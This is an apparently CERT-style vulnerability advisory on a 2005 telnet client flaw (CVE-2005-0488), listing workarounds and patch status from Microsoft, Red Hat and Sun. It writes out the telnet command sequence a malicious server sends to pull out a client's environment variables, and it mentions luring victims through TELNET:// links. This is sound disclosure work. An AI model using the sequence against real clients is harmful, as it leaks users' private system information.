Telnet Client Information Disclosure Vulnerability

Overview

A vulnerability in the handling of the NEW-ENVIRON command allows a malicious telnet server to gain information from a client’s environment variables.

Description

The Telnet network protocol is described in RFC854 and RFC855 as a general, bi-directional communications facility. The Telnet protocol is commonly used for command-line login sessions between Internet hosts.

The vulnerability is in the NEW-ENVIRON sub-command that is the mechanism to used for passing environment information between a telnet client and server. Use of this mechanism enables a telnet user to propagate configuration information to a remote host when connecting. Please see RFC1572 for more information. As specified in section 3 of RFC1572 the expected default behavior should be “that there will not be any exchange of environment information”.

In order to exploit this vulnerability, a malicious server can send a connected client the following telnet command:

SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE
Vulnerable telnet clients will send the value of the referenced environment variable. Environment variables may contain a variety of the information such as local username, executable file search paths, locations of sensitive data, and other potentially sensitive information about the client computer.

Please note telnet functionality has been embedded in many applications and not just underlying operating systems distributions.

The iDefense Security Advisory contains additional information about affected and unaffected vendors.

---

Impact

An attacker may be able to gather information about remote systems and users who connect to attackers malicious telnet server. An attacker would have to trick a victim into initiating a telnet connection using a vulnerable client. This may be accomplished with an HTML rendered email or web page, using the TELNET:// URI handler, however further user interaction may be required.

---

Solution

Apply an update from your vendor

Patches, updates, and fixes should be available from multiple vendors.

---

Workarounds
Disable access to telnet, limit the use of telnet to trusted sites and/or encourage the use more secure remote connection clients.

On Unix systems it might be viable to remove execute permission from telnet and other binaries that perform telnet.

On Windows systems changing or removing the registry key entry: HKEY_CLASSES_ROOT\telnet\shell\open\command
should reduce the likelihood of successful automatic exploitation attempts such as those using telnet URLs.

Note these workarounds do not address the underlying vulnerability.

---

Vendor Information

800829

Filter by status: All Affected Not Affected Unknown

Filter by content: __ Additional information available

__ Sort by: Status Alphabetical

Expand all

Javascript is disabled. Click here to view vendors.

Microsoft Corporation __ Affected

Updated: June 14, 2005

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Microsoft has issued patches in relation to this vulnerability, for more information see Microsoft Security Bulletin MS05-033:

<http://www.microsoft.com/technet/security/bulletin/MS05-033.mspx&gt;

If you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:[email protected]?Subject=VU%23800829 Feedback>).

Red Hat Inc. __ Affected

Updated: July 28, 2005

Status

Affected

Vendor Statement

Vendor Statement: Red Hat, Inc

Updates are available for Red Hat Enterprise Linux 2.1, 3 and 4 to correct
this issue. New telnet and Kerberos packages along with our advisory are
available at the URL below and by using the Red Hat Network ‘up2date’ tool.

<http://rhn.redhat.com/errata/CAN-2005-0488.html&gt;

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Red Hat Inc. has released a security update in relation to this issue:
<https://rhn.redhat.com/errata/RHSA-2005-504.html&gt;

If you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:[email protected]?Subject=VU%23800829 Feedback>).

Sun Microsystems Inc. __ Affected

Updated: June 14, 2005

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Sun Microsystems have issued two Sun(sm) Alert Notifications in relation to this vulnerability including workaround and patch information. For more information please see:

<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1&gt;
<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1&gt;

If you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:[email protected]?Subject=VU%23800829 Feedback>).

CVSS Metrics

Group	Score	Vector
Base
Temporal
Environmental

References

• <http://www.idefense.com/application/poi/display?id=260&gt;
• <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0488&gt;
• <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1205&gt;
• <http://www.apps.ietf.org/rfc/rfc1572.html&gt;
• <http://www.securityfocus.com/archive/1/402230&gt;

Acknowledgements

Gaël Delalleau is credited with this discovery. Thank you to iDefense for coordinating the release of information about this issue.

This document was written by Robert Mead based on information in the iDEFENSE Security Advisory

Other Information

CVE IDs:	CVE-2005-0488
Severity Metric:	0.17 Date Public: